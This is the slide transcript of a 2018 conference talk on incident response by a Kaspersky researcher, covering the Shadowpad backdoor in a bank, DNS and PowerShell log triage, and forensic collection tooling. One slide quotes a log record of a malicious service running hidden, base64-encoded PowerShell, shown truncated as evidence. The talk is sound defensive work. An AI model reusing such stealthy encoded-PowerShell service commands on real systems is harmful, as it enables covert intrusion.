Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Sergey Golovanov - Indecent Response 2018

DC7499
February 10, 2018
Education
0
440

Sergey Golovanov - Indecent Response 2018

DC7499

February 10, 2018
Tweet

More Decks by DC7499

See All by DC7499
Sergey Sobko - Hackashop: Hackathon + Pentest + Workshop [RU]
defcon
0
490
Dmitry Sklyarov - Intel ME: Security keys Genealogy, Obfuscation and other Magic
defcon
0
240
Anton Lopanitsyn - Initial reconnaissance of web applications.
defcon
0
280
Dmitry Volkov - Private messengers: without pain??
defcon
1
220
Andrey Skuratov and Sergey Migalin - DNS tunneling in 2018. What is that, and what to do with it?
defcon
1
200
Sergey Belov - Another side of Bug Bounty programs
defcon
0
290
Dmitry Sklyarov - Intel ME: Flash file system explained
defcon
0
460
Maxim Goryachiy & Mark Ermolov - Inside Intel Management Engine
defcon
0
520
Kupreev Oleg & Putin Vladimir - Your very own driver for the custom NVMe device from the scratch: reading of the flash memory of iPhone 7
defcon
1
540

Other Decks in Education

See All in Education
お仕事図鑑pitchトーク
tetsuyaooooo
0
2.3k
2409_CompanyInfo_Hanji_published.pdf
yosukemurata
0
630
開発終了後こそ成長のチャンス!プロダクト運用を見送った先のアクションプラン
ohmori_yusuke
2
190
1030
cbtlibrary
0
320
オープンソース防災教育ARアプリの開発と地域防災での活用
nro2daisuke
0
200
Flinga
matleenalaakso
2
13k
LinkedIn
matleenalaakso
0
3.4k
認知情報科学科_キャリアデザイン_大学院の紹介
yuyakurodou
0
140
ヘイトスピーチがある世界のコミュニケーション
ktanishima
0
370
Nodiレクチャー 「CGと数学」講義資料 2024/11/19
masatatsu
1
250
Evaluation Methods - Lecture 6 - Human-Computer Interaction (1023841ANR)
signer
PRO
0
730
Chapitre_1_-__L_atmosphère_et_la_vie_-_Partie_1.pdf
bernhardsvt
0
230

Featured

See All Featured
Dealing with People You Can't Stand - Big Design 2015
cassininazir
365
25k
The Cost Of JavaScript in 2023
addyosmani
45
7k
Building Your Own Lightsaber
phodgson
103
6.1k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
2
160
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
95
17k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
28
9.1k
Code Reviewing Like a Champion
maltzj
520
39k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
59k
How GitHub (no longer) Works
holman
311
140k
Fontdeck: Realign not Redesign
paulrobertlloyd
82
5.3k
Designing for Performance
lara
604
68k

Transcript

  1. Indecent response 2018 Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky

    Lab

  2. Challenge: find a SDC bus speed

  3. None

  4. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  5. 1.Shadowpad

  6. Case overview: 1.Antifraud system in a bank is detecting printing

    of a lot of elite cards for the last several hours 2.Bank is starting network audit 3.Bank is discovering suspicion DNS requests 4.Forensics can not find malware on PCs 5.Bank asks for help…

  7. DNS requests

  8. None
  9. None

  10. “Our worldwide customers range from small businesses right up to

    global Fortune 500 companies.” NetSarang AmericanExpress BankofAmericaCorp. BankofChina BNPParibas Citigroup DeutscheBank Fortis GeneralElectric INGGroup MerrillLynch MorganStanley ShinhanFinancialGroup SocieteGenerale UBS https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru

  11. https://securelist.com/shadowpad -in-corporate-networks/81432/

  12. What was done?

  13. AutoMA – static analysis framework

  14. Shadowpad after autoMA

  15. Miniduke after autoMA

  16. 2.0x403AA91EE

  17. Case overview:

  18. None
  19. None

  20. How to find suspicion DNS requests? sort | uniq -c

    | sort -rn

  21. How to find suspicion powershell? sort | uniq -c |

    sort -rn

  22. parse_evtx.exe System.evtx | findstr /i "power" | more Record #2396788

    2027.02.22-08:03:00 'Computer':PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':‘GUID'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A FMAdAByAGUAYQBtACgA

  23. https://github.com/KasperskyLab/ForensicsTools/

  24. 3.Scanner2

  25. Case overview: 1. No money 2. No logs 3. No

    team 4. No idea about network 5. CISO!

  26. What to do? we need logs we need mfts we

    need regs

  27. WE NEED TO RECOMPILE EVERYTHING!

  28. Awesome batch file

  29. How to find something suspicion ? sort | uniq -c

    | sort -rn

  30. https://cdn.securelist.com/files/ 2017/12/HappyNewYear.zip

  31. 4. PLANS

  32. 1. MFT is a hell. Sleuthkit is not enough. We

    need more data about deleted files. 2. USN J is required with no HDD touch. 3. Reg analysis is needed with unallocated part.

  33. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  34. Зачем?

  35. None

  36. Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab